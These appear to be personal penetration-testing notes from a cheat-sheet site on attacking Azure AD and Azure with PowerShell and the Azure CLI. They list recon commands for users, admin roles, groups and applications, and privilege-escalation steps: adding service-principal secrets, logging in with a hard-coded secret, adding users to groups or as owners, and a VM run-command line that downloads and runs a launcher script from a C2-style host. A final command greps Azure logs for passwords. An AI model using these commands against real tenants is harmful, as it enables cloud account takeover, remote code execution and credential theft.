AzureCli - PowerShell

LogoAzure CLI reference command article listMicrosoftLearn

Connect: 

connect-azuread

Recon:

Get Ad User:

Get-AzureAdUser 
Get-AzureAdUser | ?{$_.DisplayName -eq 'Administrator'}

Get AD Directory Role: 

Get-AzureADDirectoryRole 
Get-AzureADDirectoryRole | ?{$_.DisplayName -eq 'Global Administrator'} | select DisplayName, ObjectId,RoleTemplateId

Get AD Directory Role Member (based off above ObjectId):

Get-AzureADDirectoryRoleMember 
Get-AzureADDirectoryRoleMember -ObjectId "17ddcf1d-d9af-4686-b229-4606e9f3d101"

Get AD Group: 

Get-AzureADGroup
Get-AzureADGroup -ObjectId "ObjectID"

Get AD Group member: 

Get-AzureADGroupMember -ObjectId d2b8110d-900f-4a37-92f0-b9c541ee4440

Get AD Applications: 

Get-AzureADApplication
Get-AzureADApplication -ObjectId "17ddcf1d-d9af-4686-b229-4606e9f3d101"

Get AD Application Owner:

Get-AzureADApplicationOwner -ObjectId "74897263-fd31-48b8-8370-9fb8a847e9ef"

PrivEsc:

Applications & Service Principle exploitation

Add Application Secret: 

# best to use PowerZure here 
Add-AzureADSPSecret -ApplicationName APPLICATION -Verbose

Authenticate as Service principle:

$ApplicationId = "2097243e-269f-47-8d-f9c62ecc8b5c"
$SecurePassword = "Z1Y~TjWzaZw"
$SecurePassword = ConvertTo-SecureString -String $SecurePassword -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $ApplicationId, $SecurePassword
Connect-AzAccount -Credential $Credential -Tenant  b20fc61c-960d-4f40-bbbe-17ac412fe0c0  -ServicePrincipal

AZAddMembers

add target to group: 

Add-AzureADGroupMember -ObjectId GROUP-ID -RefObjectId USER-ID

AzureADGroupOwner

Add-AzureADGroupOwner -ObjectId b20fc61c-960d-4f40-bbbe-17ac412fe0c0 -RefObjectId b20fc61c-960d-4f40-bbbe-17ac412fe0c0

Virtual Machine:

List VMs:

(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}

Run command:

az vm run-command invoke --command-id RunPowerShellScript --name -g --scripts @join-domain-script.ps1 --parameters "user=admin" "password=secret-password"
az vm run-command invoke
az vm run-command invoke --command-id RunPowerShellScript --name CSETest -g TESTER --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"

Privesc:

(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}

Azure shell:

history enumeration:

grep -b5 -a5 Password .Azure/ErrorRecords/New-AzVM_2019-10-18-T21-39-25-103.log

PreviousAzureCli - AZNextAzureAD

Last updated